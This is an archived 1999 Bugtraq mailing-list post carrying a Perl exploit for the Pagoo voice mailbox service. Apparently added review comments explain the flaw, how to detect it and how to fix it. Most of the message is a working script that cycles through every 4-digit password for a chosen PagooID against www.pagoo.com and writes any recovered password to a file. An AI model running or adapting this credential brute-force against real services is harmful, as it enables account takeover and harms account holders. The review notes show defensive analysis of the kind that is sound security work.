From bugtraq Tue Jun 22 17:06:05 1999
From: Elaich Of Hhp
Date: Tue, 22 Jun 1999 17:06:05 +0000
To: bugtraq
Subject: hhp: Pagoo VMB remote exploit.
X-MARC-Message: https://marc.info/?l=bugtraq&m=93015856117594

#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: elaich of the hhp.
# http://hhp.hemp.net/
# '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
#
# Review notes (defensive reading of this listing):
#  - Weakness shown: per the description above, the UpdateForm login
#    accepts an unlimited number of guesses for a 4-digit password, so the
#    whole keyspace (0000-9999) can be walked with one request per value.
#    This is missing attempt limiting on a low-entropy secret, not a
#    memory-safety or injection bug.
#  - The account id and the password travel in the GET query string (see
#    $url below), so each attempt is visible in web-server and proxy logs.
#  - Detection: many requests for signup.asp with Service=UpdateForm, the
#    same PagooID and a stepping Password value, each on a fresh TCP
#    connection.
#  - Mitigation on the service side: per-account and per-source attempt
#    throttling or lockout, a larger credential space, and credentials
#    sent in a request body over an encrypted channel instead of the URL.
#  - The script runs without `use strict` / `use warnings`; every variable
#    below ($box, $host, $num, $url, $socket, $i) is a package global.

use IO::Socket;

# Exactly one command-line argument is required; it is stored in $box and
# later interpolated, unencoded, into the request URL as the PagooID.
# NOTE(review): the usage text has no argument name in it - presumably an
# angle-bracketed placeholder was lost when the message was archived.
die "usage: $0 \n" unless(@ARGV == 1);
($box) = (@ARGV);

# Results are appended (">>") to the file "pagooids" in the current
# directory, through a bareword handle and two-argument open.
# The die message names ".pagoo", which does not match the file opened.
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;      # unbuffered, so a hit reaches the file before exit

$host = "www.pagoo.com";
autoflush STDOUT 1;   # unbuffered progress output

# parse(NUM): submit one candidate password NUM for the account in $box.
# Opens a new TCP connection to $host port 80, sends a single bare
# "GET <url>" line (no HTTP version, no headers) and scans the response
# line by line. Does not return a useful value; on a response line
# containing "First Name" it prints and logs the pair and exits the
# whole program with status 0.
sub parse {
  ($num) = @_;        # writes the global $num, the same one the caller loops on
  $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
  $socket = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 80,
                                  Proto    => "tcp") or die "Can't connect.\n";
  print $socket "GET $url\n";
  print "Trying password: $num of 9999.\n";
  while(<$socket>) {
    chomp;
    # "Password invalid" is the marker this script uses for a rejected guess.
    # NOTE(review): `break` is not a loop-control statement in Perl; without
    # strict it appears to be a no-op bareword, so reading presumably goes
    # on until the server closes the connection - confirm.
    if(/Password invalid/) {
      break;
    }
    # "First Name" is the marker used for the authenticated UpdateForm page.
    if(/First Name/) {
      print "PagooID password extracted...\n";
      print "PagooID: $box / Password: $num\n";
      print OUT "PagooID: $box / Password: $num\n";   # recovered pair stored in cleartext
      exit 0;
    }
  }
}

# Driver: first candidate is the string '0000', then the loop increments
# $num before every further call.
# NOTE(review): `++` on this string presumably keeps the zero padding
# (Perl string increment) - confirm. The loop body runs 10000 times after
# the initial call, so the final candidate would be one past 9999 - verify.
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++) {
  $num++;
  parse $num;
}